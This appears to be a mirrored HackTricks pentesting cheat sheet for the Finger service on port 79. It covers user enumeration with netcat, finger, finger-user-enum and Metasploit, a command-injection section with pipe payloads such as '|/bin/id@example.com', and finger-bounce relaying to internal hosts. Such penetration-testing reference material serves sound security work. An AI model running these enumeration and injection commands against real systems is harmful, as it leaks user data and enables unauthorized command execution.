mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-23 05:03:35 +00:00
66 lines
1.5 KiB
Markdown
66 lines
1.5 KiB
Markdown
# 79 - Pentesting Finger
|
|
|
|
## **Basic Info**
|
|
|
|
**Finger** is a program you can use to find information about computer users. It usually lists the login name, the full name, and possibly other details about the user you are fingering. These details may include the office location and phone number \(if known\), login time, idle time, time mail was last read, and the user's plan and project files.
|
|
|
|
**Default port:** 79
|
|
|
|
```text
|
|
PORT STATE SERVICE
|
|
79/tcp open finger
|
|
```
|
|
|
|
## **Enumeration**
|
|
|
|
### **Banner Grabbing/Basic connection**
|
|
|
|
```bash
|
|
nc -vn <IP> 79
|
|
echo "root" | nc -vn <IP> 79
|
|
```
|
|
|
|
### **User enumeration**
|
|
|
|
```bash
|
|
finger @<Victim> #List users
|
|
finger admin@<Victim> #Get info of user
|
|
finger user@<Victim> #Get info of user
|
|
```
|
|
|
|
Alternatively you can use **finger-user-enum** from [**pentestmonkey**](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum), some examples:
|
|
|
|
```bash
|
|
finger-user-enum.pl -U users.txt -t 10.0.0.1
|
|
finger-user-enum.pl -u root -t 10.0.0.1
|
|
finger-user-enum.pl -U users.txt -T ips.txt
|
|
```
|
|
|
|
#### **Nmap execute a script for doing using default scripts**
|
|
|
|
### Metasploit uses more tricks than Nmap
|
|
|
|
```text
|
|
use auxiliary/scanner/finger/finger_users
|
|
```
|
|
|
|
### Shodan
|
|
|
|
* `port:79 USER`
|
|
|
|
## Command execution
|
|
|
|
```bash
|
|
finger "|/bin/id@example.com"
|
|
finger "|/bin/ls -a /@example.com"
|
|
```
|
|
|
|
## Finger Bounce
|
|
|
|
[Use a system as a finger relay](https://securiteam.com/exploits/2BUQ2RFQ0I/)
|
|
|
|
```text
|
|
finger user@host@victim
|
|
finger @internal@external
|
|
```
|
|
|